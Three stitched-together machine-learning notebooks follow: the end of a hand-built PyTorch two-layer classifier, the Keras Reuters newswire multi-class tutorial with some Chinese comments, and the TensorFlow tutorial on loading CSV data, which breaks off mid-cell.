x_val = x_val.reshape(x_val.shape[0], -1).T
print("*" * 80)
print("x_train:{}".format(x_train.shape))
print("x_val:{}".format(x_val.shape))
print("y_train:{}".format(y_train.shape))
print("y_val:{}".format(y_val.shape))
print("*" * 80)
assert (x_train.shape == (maxlen, 25000))
assert (y_train.shape == (1, 25000))
assert (x_val.shape == (maxlen, 25000))
assert (y_val.shape == (1, 25000))
print("*" * 80)
print("max x_train before:{}".format(np.max(x_train)))
print("max x_val before:{}".format(np.max(x_val)))
print("min before:{}, {}".format(np.min(x_train), np.min(x_val)))
# norm didn't work well
# norm = np.linalg.norm(x_train, ord=2)
# print("norm={}".format(norm))
# normalizing around max_features works well
# x_train = x_train / max_features
# x_val = x_val / max_features
# centering around mean
x_mean = np.mean(x_train)
x_std = np.std(x_train)
print("(mean,std)=({},{})".format(x_mean, x_std))
x_train = (x_train - x_mean) / x_std
x_val = (x_val - x_mean) / x_std
print("max x_train after norm:{}".format(np.max(x_train)))
print("max x_val after norm:{}".format(np.max(x_val)))
print("min after norm:{}, {}".format(np.min(x_train), np.min(x_val)))
# assert ((x_train >= 0.).all() and (x_train < 1.).all())
print("*" * 80)
print("y_train unique vals:{}".format(np.unique(y_train)))
print("y_val unique vals:{}".format(np.unique(y_train)))
print("*" * 80)
# 2 layer network
m = x_train.shape[1]
n_x = x_train.shape[0]
n_h = 128
n_y = 1
# init params
W1 = torch.randn(n_h, n_x).cuda() * 0.01
b1 = torch.zeros((n_h, 1)).cuda()
W2 = torch.randn(n_y, n_h).cuda() * 0.01
b2 = torch.zeros((n_y, 1)).cuda()
assert (W1.size() == (n_h, n_x))
assert (b1.size() == (n_h, 1))
assert (W2.size() == (n_y, n_h))
assert (b2.size() == (n_y, 1))
costs = []
n_iter = 100000
learning_rate = 0.01
x_train = torch.tensor(x_train,dtype=torch.float32).cuda()
y_train = torch.tensor(y_train,dtype=torch.float32).cuda()
for i in range(0, n_iter):
# forward
# A1, cache1 = linear_activation_forward(X, W1, b1, "relu")
# do a forward pass over relu
# print("W1.shape:{}".format(W1.shape))
# print("X.shape:{}".format(x_train.shape))
# m x n * n x p = m x p
# (5, 200) * (200, 25000)
Z1 = torch.mm(W1, x_train).cuda() + b1
assert (Z1.size() == (n_h, m))
A1 = relu(Z1)
assert (A1.size() == (n_h, m))
# A2, cache2 = linear_activation_forward(A1, W2, b2, "sigmoid")
Z2 = torch.mm(W2, A1).cuda() + b2
assert (Z2.size() == (n_y, m))
A2 = sigmoid(Z2)
assert (A2.size() == (n_y, m))
# compute cost
cost = -(1 / m) * torch.sum(y_train * torch.log(A2).cuda() + (1 - y_train) * torch.log(1 - A2).cuda()).cuda()
cost = torch.squeeze(cost)
# backward compute loss
dA2 = -(torch.divide(y_train, A2).cuda() - torch.divide(1 - y_train, 1 - A2).cuda())
# print("dA2.shape={}".format(dA2.shape))
assert (dA2.size() == A2.size())
# backward
dZ2 = back_sigmoid(Z2, dA2)
assert (dZ2.size() == dA2.size())
dW2 = (1 / m) * torch.mm(dZ2, A1.T).cuda()
db2 = (1 / m) * torch.sum(dZ2, dim=1, keepdims=True).cuda()
dA1 = torch.mm(W2.T, dZ2).cuda()
assert (dA1.size() == A1.size())
assert (dW2.size() == W2.size())
assert (db2.size() == b2.size())
dZ1 = back_relu(Z1, dA1)
assert (dZ1.size() == dA1.size())
dW1 = (1 / m) * torch.mm(dZ1, x_train.T).cuda()
db1 = (1 / m) * torch.sum(dZ1, dim=1, keepdims=True).cuda()
assert (dW1.size() == W1.size())
assert (db1.size() == b1.size())
# update params
W2 = W2 - learning_rate * dW2
b2 = b2 - learning_rate * db2
W1 = W1 - learning_rate * dW1
b1 = b1 - learning_rate * db1
# print stats
if i % 1000 == 0:
print("Cost after iteration {}: {}".format(i, cost))
if i % 1000 == 0:
costs.append(cost)
#predict
p = torch.zeros((1, x_train.shape[1])).cuda()
Z1 = torch.mm(W1, x_train).cuda() + b1
A1 = relu(Z1)
Z2 = torch.mm(W2, A1).cuda() + b2
A2 = sigmoid(Z2)
# convert probas to 0/1 predictions
for i in range(0, A2.shape[1]):
if A2[0, i] > 0.5:
p[0, i] = 1
else:
p[0, i] = 0
print("Accuracy on training set: " + str(torch.sum((p == y_train)/x_train.shape[1]).cuda()))
x_val = torch.tensor(x_val,dtype=torch.float32).cuda()
y_val = torch.tensor(y_val,dtype=torch.float32).cuda()
#predict
p = torch.zeros((1, x_val.shape[1])).cuda()
Z1 = torch.mm(W1, x_val).cuda() + b1
A1 = relu(Z1)
Z2 = torch.mm(W2, A1).cuda() + b2
A2 = sigmoid(Z2)
# convert probas to 0/1 predictions
for i in range(0, A2.shape[1]):
if A2[0, i] > 0.5:
p[0, i] = 1
else:
p[0, i] = 0
print("Accuracy on validation/test set: " + str(torch.sum((p == y_val)/x_val.shape[1]).cuda()))
plt.plot(costs)
plt.ylabel('cost')
plt.xlabel('iterations (per hundreds)')
plt.title("Learning rate =" + str(learning_rate))
plt.show()
```
# summary
So even with enough power(GPU) and kinda low loss/cost we actually don't get better accuracy on validation set.
That looks like **overfitting**.
| github_jupyter |
```
import keras
keras.__version__
```
# Classifying newswires: a multi-class classification example
This notebook contains the code samples found in Chapter 3, Section 5 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.
----
In the previous section we saw how to classify vector inputs into two mutually exclusive classes using a densely-connected neural network.
But what happens when you have more than two classes?
In this section, we will build a network to classify Reuters newswires into 46 different mutually-exclusive topics. Since we have many
classes, this problem is an instance of "multi-class classification", and since each data point should be classified into only one
category, the problem is more specifically an instance of "single-label, multi-class classification". If each data point could have
belonged to multiple categories (in our case, topics) then we would be facing a "multi-label, multi-class classification" problem.
## The Reuters dataset
We will be working with the _Reuters dataset_, a set of short newswires and their topics, published by Reuters in 1986. It's a very simple,
widely used toy dataset for text classification. There are 46 different topics; some topics are more represented than others, but each
topic has at least 10 examples in the training set.
Like IMDB and MNIST, the Reuters dataset comes packaged as part of Keras. Let's take a look right away:
```
from keras.datasets import reuters
(train_data, train_labels), (test_data, test_labels) = reuters.load_data(num_words=10000)
```
Like with the IMDB dataset, the argument `num_words=10000` restricts the data to the 10,000 most frequently occurring words found in the
data.
We have 8,982 training examples and 2,246 test examples:
```
len(train_data)
len(test_data)
```
As with the IMDB reviews, each example is a list of integers (word indices):
```
train_data[10]
```
Here's how you can decode it back to words, in case you are curious:
```
word_index = reuters.get_word_index()
reverse_word_index = dict([(value, key) for (key, value) in word_index.items()])
# Note that our indices were offset by 3
# because 0, 1 and 2 are reserved indices for "padding", "start of sequence", and "unknown".
decoded_newswire = ' '.join([reverse_word_index.get(i - 3, '?') for i in train_data[0]])
decoded_newswire
```
The label associated with an example is an integer between 0 and 45: a topic index.
```
train_labels[10]
```
## Preparing the data
We can vectorize the data with the exact same code as in our previous example:
```
import numpy as np
def vectorize_sequences(sequences, dimension=10000):
results = np.zeros((len(sequences), dimension))
for i, sequence in enumerate(sequences):
results[i, sequence] = 1.
return results
# Our vectorized training data
x_train = vectorize_sequences(train_data)
# Our vectorized test data
x_test = vectorize_sequences(test_data)
```
To vectorize the labels, there are two possibilities: we could just cast the label list as an integer tensor, or we could use a "one-hot"
encoding. One-hot encoding is a widely used format for categorical data, also called "categorical encoding".
For a more detailed explanation of one-hot encoding, you can refer to Chapter 6, Section 1.
In our case, one-hot encoding of our labels consists in embedding each label as an all-zero vector with a 1 in the place of the label index, e.g.:
```
def to_one_hot(labels, dimension=46):
results = np.zeros((len(labels), dimension))
for i, label in enumerate(labels):
results[i, label] = 1.
return results
# Our vectorized training labels
one_hot_train_labels = to_one_hot(train_labels)
# Our vectorized test labels
one_hot_test_labels = to_one_hot(test_labels)
```
Note that there is a built-in way to do this in Keras, which you have already seen in action in our MNIST example:
```
from keras.utils.np_utils import to_categorical
one_hot_train_labels = to_categorical(train_labels)
one_hot_test_labels = to_categorical(test_labels)
```
## Building our network
这个主题分类问题看起来非常类似于我们以前的电影评论分类问题:在这两种情况下,我们正在尝试分类短片段的文本。然而,这里有一个新的约束:输出类的数量从2增加到46,即输出空间的维数要大得多。
在我们所使用的密集层堆栈中,每个层只能访问前一层输出中存在的信息。如果一层删除了与分类问题相关的信息,那么这些信息就永远不能被后面的层所恢复:每一层都有可能成为“信息瓶颈”。在我们前面的例子中,我们使用了16个维度的中间层,但是16维空间可能太有限,无法学会分离46个不同的类:这样的小层可以充当信息瓶颈,永久地丢弃相关信息。
由于这个原因,我们将使用具有更多单元的层。这里使用用64个单元:
```
from keras import models
from keras import layers
model = models.Sequential()
model.add(layers.Dense(64, activation='relu', input_shape=(10000,)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(46, activation='softmax'))
```
There are two other things you should note about this architecture:
* We are ending the network with a `Dense` layer of size 46. This means that for each input sample, our network will output a
46-dimensional vector. Each entry in this vector (each dimension) will encode a different output class.
* The last layer uses a `softmax` activation. You have already seen this pattern in the MNIST example. It means that the network will
output a _probability distribution_ over the 46 different output classes, i.e. for every input sample, the network will produce a
46-dimensional output vector where `output[i]` is the probability that the sample belongs to class `i`. The 46 scores will sum to 1.
The best loss function to use in this case is `categorical_crossentropy`. It measures the distance between two probability distributions:
in our case, between the probability distribution output by our network, and the true distribution of the labels. By minimizing the
distance between these two distributions, we train our network to output something as close as possible to the true labels.
```
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
```
## Validating our approach
Let's set apart 1,000 samples in our training data to use as a validation set:
```
x_val = x_train[:1000]
partial_x_train = x_train[1000:]
y_val = one_hot_train_labels[:1000]
partial_y_train = one_hot_train_labels[1000:]
```
Now let's train our network for 20 epochs:
```
history = model.fit(partial_x_train,
partial_y_train,
epochs=20,
batch_size=512,
validation_data=(x_val, y_val))
```
Let's display its loss and accuracy curves:
```
import matplotlib.pyplot as plt
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(loss) + 1)
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
plt.clf() # clear figure
acc = history.history['acc']
val_acc = history.history['val_acc']
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
```
It seems that the network starts overfitting after 8 epochs. Let's train a new network from scratch for 8 epochs, then let's evaluate it on
the test set:
```
model = models.Sequential()
model.add(layers.Dense(64, activation='relu', input_shape=(10000,)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(46, activation='softmax'))
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(partial_x_train,
partial_y_train,
epochs=8,
batch_size=512,
validation_data=(x_val, y_val))
results = model.evaluate(x_test, one_hot_test_labels)
results
```
Our approach reaches an accuracy of ~78%. With a balanced binary classification problem, the accuracy reached by a purely random classifier
would be 50%, but in our case it is closer to 19%, so our results seem pretty good, at least when compared to a random baseline:
下面展示了随机猜测所有样本的类时,猜测正确的概率。
```
import copy
test_labels_copy = copy.copy(test_labels)
np.random.shuffle(test_labels_copy)
float(np.sum(np.array(test_labels) == np.array(test_labels_copy))) / len(test_labels)
```
## Generating predictions on new data
We can verify that the `predict` method of our model instance returns a probability distribution over all 46 topics. Let's generate topic
predictions for all of the test data:
```
predictions = model.predict(x_test)
```
Each entry in `predictions` is a vector of length 46:
```
predictions[0].shape
```
The coefficients in this vector sum to 1:表示概率。
```
np.sum(predictions[0])
```
The largest entry is the predicted class, i.e. the class with the highest probability:
```
np.argmax(predictions[0])
```
## A different way to handle the labels and the loss
We mentioned earlier that another way to encode the labels would be to cast them as an integer tensor, like such:
```
y_train = np.array(train_labels)
y_test = np.array(test_labels)
```
The only thing it would change is the choice of the loss function. Our previous loss, `categorical_crossentropy`, expects the labels to
follow a categorical encoding. With integer labels, we should use `sparse_categorical_crossentropy`:
```
model.compile(optimizer='rmsprop', loss='sparse_categorical_crossentropy', metrics=['acc'])
```
This new loss function is still mathematically the same as `categorical_crossentropy`; it just has a different interface.
## On the importance of having sufficiently large intermediate layers
十分重要!!!
We mentioned earlier that since our final outputs were 46-dimensional, we should avoid intermediate layers with much less than 46 hidden
units. Now let's try to see what happens when we introduce an information bottleneck by having intermediate layers significantly less than
46-dimensional, e.g. 4-dimensional.
```
model = models.Sequential()
model.add(layers.Dense(64, activation='relu', input_shape=(10000,)))
model.add(layers.Dense(4, activation='relu'))
model.add(layers.Dense(46, activation='softmax'))
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(partial_x_train,
partial_y_train,
epochs=20,
batch_size=128,
validation_data=(x_val, y_val))
```
Our network now seems to peak at ~71% test accuracy, a 8% absolute drop. This drop is mostly due to the fact that we are now trying to
compress a lot of information (enough information to recover the separation hyperplanes of 46 classes) into an intermediate space that is
too low-dimensional. The network is able to cram _most_ of the necessary information into these 8-dimensional representations, but not all
of it.
## Further experiments
* Try using larger or smaller layers: 32 units, 128 units...
* We were using two hidden layers. Now try to use a single hidden layer, or three hidden layers.
## Wrapping up
Here's what you should take away from this example:
* If you are trying to classify data points between N classes, your network should end with a `Dense` layer of size N.
* 在单标签多类分类问题中,您的网络应该以SOFTMax激活结束,以便它将在N个输出类上输出概率分布。
* _Categorical crossentropy_ 几乎总是你用来解决这些问题的损失函数。它最小化了由网络输出的概率分布与目标的真实分布之间的距离。
* There are two ways to handle labels in multi-class classification:
** Encoding the labels via "categorical encoding" (also known as "one-hot encoding") and using `categorical_crossentropy` as your loss
function.
** Encoding the labels as integers and using the `sparse_categorical_crossentropy` loss function.
* If you need to classify data into a large number of categories, then you should avoid creating information bottlenecks in your network by having
intermediate layers that are too small.
| github_jupyter |
##### Copyright 2019 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# Load CSV data
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://www.tensorflow.org/tutorials/load_data/csv"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/en/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
</td>
<td>
<a href="https://storage.googleapis.com/tensorflow_docs/docs/site/en/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
</td>
</table>
This tutorial provides examples of how to use CSV data with TensorFlow.
There are two main parts to this:
1. **Loading the data off disk**
2. **Pre-processing it into a form suitable for training.**
This tutorial focuses on the loading, and gives some quick examples of preprocessing. For a tutorial that focuses on the preprocessing aspect see the [preprocessing layers guide](https://www.tensorflow.org/guide/keras/preprocessing_layers#quick_recipes) and [tutorial](../tutorials/structured_data/preprocessing_layers.ipynb).
## Setup
```
import pandas as pd
import numpy as np
# Make numpy values easier to read.
np.set_printoptions(precision=3, suppress=True)
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow.keras.layers.experimental import preprocessing
```
## In memory data
For any small CSV dataset the simplest way to train a TensorFlow model on it is to load it into memory as a pandas Dataframe or a NumPy array.
A relatively simple example is the [abalone dataset](https://archive.ics.uci.edu/ml/datasets/abalone).
* The dataset is small.
* All the input features are all limited-range floating point values.
Here is how to download the data into a [Pandas `DataFrame`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html):
```
abalone_train = pd.read_csv(
"https://storage.googleapis.com/download.tensorflow.org/data/abalone_train.csv", header=None,
names=["Length", "Diameter", "Height", "Whole weight", "Shucked weight",
"Viscera weight", "Shell weight", "Age"])
abalone_train.head()
```
The dataset contains a set of measurements of [abalone](https://en.wikipedia.org/wiki/Abalone), a type of sea snail.

[“Abalone shell”](https://www.flickr.com/photos/thenickster/16641048623/) (by [Nicki Dugan Pogue](https://www.flickr.com/photos/thenickster/), CC BY-SA 2.0)
The nominal task for this dataset is to predict the age from the other measurements, so separate the features and labels for training:
```
abalone_features = abalone_train.copy()
abalone_labels = abalone_features.pop('Age')
```
For this dataset you will treat all features identically. Pack the features into a single NumPy array.:
```
abalone_features = np.array(abalone_features)
abalone_features
```
Next make a regression model predict the age. Since there is only a single input tensor, a `keras.Sequential` model is sufficient here.
```
abalone_model = tf.keras.Sequential([
layers.Dense(64),
layers.Dense(1)
])
abalone_model.compile(loss = tf.losses.MeanSquaredError(),
optimizer = tf.optimizers.Adam())
```
To train that model, pass the features and labels to `Model.fit`:
```
abalone_model.fit(abalone_features, abalone_labels, epochs=10)
```
You have just seen the most basic way to train a model using CSV data. Next, you will learn how to apply preprocessing to normalize numeric columns.
## Basic preprocessing
It's good practice to normalize the inputs to your model. The `experimental.preprocessing` layers provide a convenient way to build this normalization into your model.
The layer will precompute the mean and variance of each column, and use these to normalize the data.
First you create the layer:
```
normalize = preprocessing.Normalization()
```
Then you use the `Normalization.adapt()` method to adapt the normalization layer to your data.
Note: Only use your training data to `.adapt()` preprocessing layers. Do not use your validation or test data.
```
normalize.adapt(abalone_features)
```
Then use the normalization layer in your model:
```
norm_abalone_model = tf.keras.Sequential([
normalize,
layers.Dense(64),
layers.Dense(1)
])
norm_abalone_model.compile(loss = tf.losses.MeanSquaredError(),
optimizer = tf.optimizers.Adam())
norm_abalone_model.fit(abalone_features, abalone_labels, epochs=10)
```
## Mixed data types
The "Titanic" dataset contains information about the passengers on the Titanic. The nominal task on this dataset is to predict who survived.

Image [from Wikimedia](https://commons.wikimedia.org/wiki/File:RMS_Titanic_3.jpg)
The raw data can easily be loaded as a Pandas `DataFrame`, but is not immediately usable as input to a TensorFlow model.
```
titanic = pd.read_csv("https://storage.googleapis.com/tf-datasets/titanic/train.csv")
titanic.head()
titanic_features = titanic.copy()
titanic_labels = titanic_features.pop('survived')
```
Because of the different data types and ranges you can't simply stack the features into NumPy array and pass it to a `keras.Sequential` model. Each column needs to be handled individually.
As one option, you could preprocess your data offline (using any tool you like) to convert categorical columns to numeric columns, then pass the processed output to your TensorFlow model. The disadvantage to that approach is that if you save and export your model the preprocessing is not saved with it. The `experimental.preprocessing` layers avoid this problem because they're part of the model.
In this example, you'll build a model that implements the preprocessing logic using [Keras functional API](https://www.tensorflow.org/guide/keras/functional.ipynb). You could also do it by [subclassing](https://www.tensorflow.org/guide/keras/custom_layers_and_models).
The functional API operates on "symbolic" tensors. Normal "eager" tensors have a value. In contrast these "symbolic" tensors do not. Instead they keep track of which operations are run on them, and build representation of the calculation, that you can run later. Here's a quick example:
```
# Create a symbolic input
input = tf.keras.Input(shape=(), dtype=tf.float32)
# Do a calculation using is
result = 2*input + 1
# the result doesn't have a value
result
calc = tf.keras.Model(inputs=input, outputs=result)
print(calc(1).numpy())
print(calc(2).numpy())
```
To build the preprocessing model, start by building a set of symbolic `keras.Input` objects, matching the names and data-types of the CSV columns.
```
inputs = {}
for name, column in titanic_features.items():
dtype = column.dtype
if dtype == object:
dtype = tf.string
else:
dtype = tf.float32
inputs[name] = tf.keras.Input(shape=(1,), name=name, dtype=dtype)
inputs
```
The first step in your preprocessing logic is to concatenate the numeric inputs together, and run them through a normalization layer:
```
numeric_inputs = {name:input for name,input in inputs.items()
if input.dtype==tf.float32}
x = layers.Concatenate()(list(numeric_inputs.values()))
norm = preprocessing.Normalization()
norm.adapt(np.array(titanic[numeric_inputs.keys()]))
all_numeric_inputs = norm(x)
all_numeric_inputs
```
Collect all the symbolic preprocessing results, to concatenate them later.
```
preprocessed_inputs = [all_numeric_inputs]
```
For the string inputs use the `preprocessing.StringLookup` function to map from strings to integer indices in a vocabulary. Next, use `preprocessing.CategoricalEncoding` to convert the indexes into `float32` data appropriate for the model.
The default settings for the `CategoricalEncoding` alyer create a one-hot vector for each input. A `layers.Embedding` would also work. See the [preprocessing layers guide](https://www.tensorflow.org/guide/keras/preprocessing_layers#quick_recipes) and [tutorial](../tutorials/structured_data/preprocessing_layers.ipynb) for more on this topic.
```
for name, input in inputs.items():
if input.dtype == tf.float32:
continue
lookup = preprocessing.StringLookup(vocabulary=np.unique(titanic_features[name]))
one_hot = preprocessing.CategoryEncoding(max_tokens=lookup.vocab_size())
x = lookup(input)
x = one_hot(x)
preprocessed_inputs.append(x)
```
With the collection of `inputs` and `processed_inputs`, you can concatenate all the preprocessed inputs together, and build a model that handles the preprocessing:
```
preprocessed_inputs_cat = layers.Concatenate()(preprocessed_inputs)
titanic_preprocessing = tf.keras.Model(inputs, preprocessed_inputs_cat)
tf.keras.utils.plot_model(model = titanic_preprocessing , rankdir="LR", dpi=72, show_shapes=True)
```
This `model` just contains the input preprocessing. You can run it to see what it does to your data. Keras models don't automatically convert Pandas `DataFrames` because it's not clear if it should be converted to one tensor or to a dictionary of tensors. So convert it to a dictionary of tensors:
```
titanic_features_dict = {name: np.array(value)
for name, value in titanic_features.items()}
```
Slice out the first training example and pass it to this preprocessing model, you see the numeric features and string one-hots all concatenated together:
```
features_dict = {name:values[:1] for name, values in titanic_features_dict.items()}
titanic_preprocessing(features_dict)
```
Now build the model on top of this:
```
def titanic_model(preprocessing_head, inputs):
body = tf.keras.Sequential([
layers.Dense(64),
layers.Dense(1)
])
preprocessed_inputs = preprocessing_head(inputs)
result = body(preprocessed_inputs)
model = tf.keras.Model(inputs, result)
model.compile(loss=tf.losses.BinaryCrossentropy(from_logits=True),
optimizer=tf.optimizers.Adam())
return model
titanic_model = titanic_model(titanic_preprocessing, inputs)
```
When you train the model, pass the dictionary of features as `x`, and the label as `y`.
```
titanic_model.fit(x=titanic_features_dict, y=titanic_labels, epochs=10)
```
Since the preprocessing is part of the model, you can save the model and reload it somewhere else and get identical results:
```
titanic_model.save('test')
reloaded = tf.keras.models.load_model('test')
features_dict = {name:values[:1] for name, values in titanic_features_dict.items()}
before = titanic_model(features_dict)
after = reloaded(features_dict)
assert (before-after)<1e-3
print(before)
print(after)
```
## Using tf.data
In the previous section you relied on the model's built-in data shuffling and batching while training the model.
If you need more control over the input data pipeline or need to use data that doesn't easily fit into memory: use `tf.data`.
For more examples see the [tf.data guide](../../guide/data.ipynb).
### On in memory data
As a first example of applying `tf.data` to CSV data consider the following code to manually slice up the dictionary of features from the previous section. For each index, it takes that index for each feature:
```
import itertools
def slices(features):
for i in itertools.count():
# For each feature take index `i`
example = {name:values[i] for name, values in features.items()}
yield example
```
Run this and print the first example:
```
for example in slices(titanic_features_dict):
for name, value in example.items():
print(f"{name:19s}: {value}")
break
```
The most basic `tf.data.Dataset` in memory data loader is the `Dataset.from_tensor_slices` constructor. This returns a `tf.data.Dataset` that implements a generalized version of the above `slices` function, in TensorFlow.
```
features_ds = tf.data.Dataset.from_tensor_slices(titanic_features_dict)
```
You can iterate over a `tf.data.Dataset` like any other python iterable:
```
for example in features_ds:
for name, value in example.items():
print(f"{name:19s}: {value}")
break
```
The `from_tensor_slices` function can handle any structure of nested dictionaries or tuples. The following code makes a dataset of `(features_dict, labels)` pairs:
```
titanic_ds = tf.data.Dataset.from_tensor_slices((titanic_features_dict, titanic_labels))
```
To train a model using this `Dataset`, you'll need to at least `shuffle` and `batch` the data.
```
titanic_batches = titanic_ds.shuffle(len(titanic_labels)).batch(32)
```
Instead of passing `features` and `labels` to `Model.fit`, you pass the dataset:
```
titanic_model.fit(titanic_batches, epochs=5)
```
### From a single file
So far this tutorial has worked with in-memory data. `tf.data` is a highly scalable toolkit for building data pipelines, and provides a few functions for dealing loading CSV files.
```
titanic_file_path = tf.keras.utils.get_file("train.csv", "https://storage.googleapis.com/tf-datasets/titanic/train.csv")
```
Now read the CSV data from the file and create a `tf.data.Dataset`.
(For the full documentation, see `tf.data.experimental.make_csv_dataset`)
```
titanic_csv_ds = tf.data.experimental.make_csv_dataset(
titanic_file_path,
batch_size=5, # Artificially small to make examples easier to show.
label_name='survived',
num_epochs=1,
ignore_errors=True,)
```
This function includes many convenient features so the data is easy to work with. This includes:
* Using the column headers as dictionary keys.
* Automatically determining the type of each column.
```
for batch, label in titanic_csv_ds.take(1):
for key, value in batch.items():
print(f"{key:20s}: {value}")
print()
print(f"{'label':20s}: {label}")
```
Note: if you run the above cell twice it will produce different results. The default settings for `make_csv_dataset` include `shuffle_buffer_size=1000`, which is more than sufficient for this small dataset, but may not be for a real-world dataset.
It can also decompress the data on the fly. Here's a gzipped CSV file containing the [metro interstate traffic dataset](https://archive.ics.uci.edu/ml/datasets/Metro+Interstate+Traffic+Volume)

Image [from Wikimedia](https://commons.wikimedia.org/wiki/File:Trafficjam.jpg)
```
traffic_volume_csv_gz = tf.keras.utils.get_file(
'Metro_Interstate_Traffic_Volume.csv.gz',
"https://archive.ics.uci.edu/ml/machine-learning-databases/00492/Metro_Interstate_Traffic_Volume.csv.gz",
cache_dir='.', cache_subdir='traffic')
```
Set the `compression_type` argument to read directly from the compressed file:
```
traffic_volume_csv_gz_ds = tf.data.experimental.make_csv_dataset(
traffic_volume_csv_gz,
batch_size=256,
label_name='traffic_volume',
num_epochs=1,
compression_type="GZIP")
for batch, label in traffic_volume_csv_gz_ds.take(1):
for key, value in batch.items():
print(f"{key:20s}: {value[:5]}")
print()
print(f"{'label':20s}: {label[:5]}")
```
Note: If you need to parse those date-time strings in the `tf.data` pipeline you can use `tfa.text.parse_time`.
### Caching
There is some overhead to parsing the csv data. For small models this can be the bottleneck in training.
Depending on your use case it may be a good idea to use `Dataset.cache` or `data.experimental.snapshot` so that the csv data is only parsed on the first epoch.
The main difference between the `cache` and `snapshot` methods is that `cache` files can only be used by the TensorFlow process that created them, but `snapshot` files can be read by other processes.
For example, iterating over the `traffic_volume_csv_gz_ds` 20 times, takes ~15 seconds without caching, or ~2s with caching.
```
%%time
for i, (batch, label) in enumerate(traffic_volume_csv_gz_ds.repeat(20)):
if i % 40 == 0:
print('.', end='')
print()
```
Note: `Dataset.cache` stores the data form the first epoch and replays it in order. So using `.cache` disables any shuffles earlier in the pipeline. Below the `.shuffle` is added back in after `.cache`.
```
%%time
caching = traffic_volume_csv_gz_ds.cache().shuffle(1000)
for i, (batch, label) in enumerate(caching.shuffle(1000).repeat(20)):
if i % 40 == 0:
print('.', end='')
print()
```
Note: `snapshot` files are meant for *temporary* storage of a dataset while in use. This is *not* a format for long term storage. The file format is considered an internal detail, and not guaranteed between TensorFlow versions.
```
%%time
snapshot = tf.data.experimental.snapshot('titanic.tfsnap')
snapshotting = traffic_volume_csv_gz_ds.apply(snapshot).shuffle(1000)
for i, (batch, label) in enumerate(snapshotting.shuffle(1000).repeat(20)):
if i % 40 == 0:
print('.', end='')
print()
```
If your data loading is slowed by loading csv files, and `cache` and `snapshot` are insufficient for your use case, consider re-encoding your data into a more streamlined format.
### Multiple files
All the examples so far in this section could easily be done without `tf.data`. One place where `tf.data` can really simplify things is when dealing with collections of files.
For example, the [character font images](https://archive.ics.uci.edu/ml/datasets/Character+Font+Images) dataset is distributed as a collection of csv files, one per font.

Image by <a href="https://pixabay.com/users/wilhei-883152/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=705667">Willi Heidelbach</a> from <a href="https://pixabay.com/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=705667">Pixabay</a>
Download the dataset, and have a look at the files inside:
```
fonts_zip = tf.keras.utils.get_file(
'fonts.zip', "https://archive.ics.uci.edu/ml/machine-learning-databases/00417/fonts.zip",
cache_dir='.', cache_subdir='fonts',
extract=True)
import pathlib
font_csvs = sorted(str(p) for p in pathlib.Path('fonts').glob("*.csv"))
font_csvs[:10]
len(font_csvs)
```
When dealing with a bunch of files you can pass a glob-style `file_pattern` to the `experimental.make_csv_dataset` function. The order of the files is shuffled each iteration.
Use the `num_parallel_reads` argument to set how many files are read in parallel and interleaved together.
```
fonts_ds = tf.data.experimental.make_csv_dataset(
file_pattern = "fonts/*.csv",
batch_size=10, num_epochs=1,
num_parallel_reads=20,
shuffle_buffer_size=10000)
```
These csv files have the images flattened out into a single row. The column names are formatted `r{row}c{column}`. Here's the first batch:
```
for features in fonts_ds.take(1):
for i, (name, value) in enumerate(features.items()):
if i>15:
break
print(f"{name:20s}: {value}")
print('...')
print(f"[total: {len(features)} features]")
```
#### Optional: Packing fields
You probably don't want to work with each pixel in separate columns like this. Before trying to use this dataset be sure to pack the pixels into an image-tensor.
Here is code that parses the column names to build images for each example:
```
import re
def make_images(features):
image = [None]*400
new_feats = {}
for name, value in features.items():
match = re.match('r(\d+)c(\d+)', name)
if match:
image[int(match.group(1))*20+int(match.group(2))] = value
else:
new_feats[name] = value
image = tf.stack(image, axis=0)
image = tf.reshape(image, [20, 20, -1])
new_feats['image'] = image
return new_feats
```
Apply that function to each batch in the dataset:
```
fonts_image_ds = fonts_ds.map(make_images)
for features in fonts_image_ds.take(1):
break
```
Plot the resulting images:
```
from matplotlib import pyplot as plt
plt.figure(figsize=(6,6), dpi=120)
for n in range(9):
plt.subplot(3,3,n+1)
plt.imshow(features['image'][..., n])
plt.title(chr(features['m_label'][n]))
